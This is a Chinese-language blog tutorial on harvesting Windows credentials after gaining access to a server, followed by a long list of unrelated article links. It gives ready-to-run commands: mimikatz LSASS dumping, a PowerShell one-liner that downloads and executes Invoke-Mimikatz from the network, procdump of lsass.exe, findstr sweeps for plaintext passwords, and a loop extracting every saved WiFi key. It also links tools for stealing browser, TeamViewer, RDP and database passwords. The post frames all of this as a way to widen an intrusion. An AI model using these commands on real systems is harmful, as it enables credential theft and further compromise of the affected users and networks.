Windows下登录凭证窃取技巧
拿到一台Windows服务器权限,收集各种登录凭证以便扩大战果。本篇分享几个窃取Windows登录凭证的工具和技巧。
1、Windows 本地密码Hash
Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系统下hash密码格式用户名称:RID:LM-HASH值:NT-HASH值。
例如:
Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040
用户名称为:Administrator
RID为:500
LM-HASH值为:AF01DF70036EBACFAAD3B435B51404EE
NT-HASH值为:44F077E27F6FEF69E7BD834C7242B040
破解方式一:hash在线破解网站
https://www.objectif-securite.ch/ophcrack
http://cmd5.com
破解方式二:mimikatz
Github地址:
https://github.com/gentilkiwi/mimikatz
mimikatz使用起来也非常简单,提取Windows系统的明文密码只需两行命令:
privilege::debug
sekurlsa::logonpasswords
破解方式三:wce
wce的常用参数使用说明如下:
参数解释:
-l 列出登录的会话和NTLM凭据(默认值)
-s 修改当前登录会话的NTLM凭据 参数:<用户名>:<域名>:<LM哈希>:<NT哈希>
-w 通过摘要式认证缓存一个明文的密码
破解方式四:Powershell+mimikatz
直接利用poweshell来调用mimikatz抓取系统内的明文密码。
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
破解方式五:prodump+mimikatz
procdump是微软官方提供的一个小工具,微软官方下载地址:
https://technet.microsoft.com/en-us/sysinternals/dd996900
# 将工具拷贝到目标机器上执行如下命令(需要管理员权限,我选择的版本是64位)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# 将生成的内存dump文件拷贝到mimikatz同目录下,双击打开mimikatz执行情况如图:
mimikatz # sekurlsa::minidump lsass.dmp
# Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full
2、抓取浏览器密码
很多浏览器都提供了记住密码的功能,用户在登录一些网站的时候会选择记住密码。
LaZagne:提取浏览器所保存的密码
github项目地址:
https://github.com/AlessandroZ/LaZagne
3、服务端明文存储密码
在一些配置文件或日志里,明文记录着敏感的密码信息,如web.config、config.ini等文件,可通过手动翻查敏感目录,也可以通过findstr命令来查找敏感文件和内容。
findstr /i /s "password" *.config
findstr /i /s "password" *.ini
findstr /i /s "password" *.xml
4、第三方运维工具托管密码解密
常见的有Linux运维工具,如Putty、xshell、winscp等,RDP管理工具,Remote Desktop Organizer,远控软件:Teamviewer等。
xshell 密码解密工具:
https://github.com/dzxs/Xdecrypt
提取WinSCP,PuTTY等保存的会话信息:
https://github.com/Arvanaghi/SessionGopher
从内存中提取TeamViewer密码的工具:
https://github.com/attackercan/teamviewer-dumper
一键破解客户端星号密码--星号密码查看器。
5、一键获取电脑wifi密码
#查看电脑连接过的所有wifi
netsh wlan show profiles
#查看wifi信号为Aaron的密码
netsh wlan show profiles name="Aaron" key=clear
#CMD一键获取 所有连接过的WIFI密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
6、Windows键盘记录工具
可以记录用户键盘操作,从而捕获用户的敏感信息,在github和T00ls都可以找到这一类的源码和工具。
7、Windows密码提取工具合集
各种Windows程序的密码提取工具,包括各种浏览器、邮箱、Windows网络密码、无线网络密钥等。
IE浏览器提取密码工具:
https://www.nirsoft.net/toolsdownload/iepv.zip
Firefox 浏览器密码提取工具:
https://www.nirsoft.net/toolsdownload/passwordfox-x64.zip
Chrome 浏览器密码提取工具:
https://www.nirsoft.net/toolsdownload/chromepass.zip
SVN密码解密器:
http://www.leapbeyond.com/ric/TSvnPD/TSvnPwd_source.zip
邮箱密码提取工具:
https://www.nirsoft.net/toolsdownload/mailpv.zip
提取.rdp文件中存储的密码:
https://www.nirsoft.net/toolsdownload/rdpv.zip
MSSQL凭据密码获取工具:
http://www.zcgonvh.com/zb_users/upload/2015/2/mssql_credentials_pwd.zip
- 【设计模式】—— 单例模式Singleton
- 【Spring实战】—— 3 使用facotry-method创建单例Bean总结
- JS面向对象高级特性
- 图解闭包
- 【web必知必会】——图解HTTP(上)
- 【web必知必会】—— 图解HTTP(下)
- 【Spring实战】—— 14 传统的JDBC实现的DAO插入和读取
- 【AngularJS】—— 4 表达式
- 【AngularJS】—— 5 表单
- 【AngularJS】—— 1 初识AngularJs
- 【AngularJS】—— 2 初识AngularJs(续)
- 【AngularJS】—— 3 我的第一个AngularJS小程序
- 【Spring实战】—— 2 构造注入
- 共享单车运维“朋友圈”越来越宽,乱停乱放现象有望改善吗?
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- EdgeX foundry树莓派搭建与MQTT通讯
- .NET Core使用NPOI将Excel中的数据批量导入到MySQL
- RTSP协议网络摄像头网页无插件直播平台EasyNVR的云端综合管理平台EasyNVS提交基础配置报错原因分析
- 10.深入k8s:调度的优先级及抢占机制源码分析
- redis
- synchronized底层是怎么实现的?
- RSA
- Syncd - 开源自动化部署工具
- pointer-events:none禁用鼠标事件
- TiCDC 首个 GA 版本发布,特性与场景全揭秘
- Linux远程ssh执行命令expect使用及几种方法
- 数据结构--线性表和链表的基础知识
- Salesforce LWC学习(二十五) Jest Test
- 自建npm包-搭建,打包,调试,发布
- 你对排序算法了解多少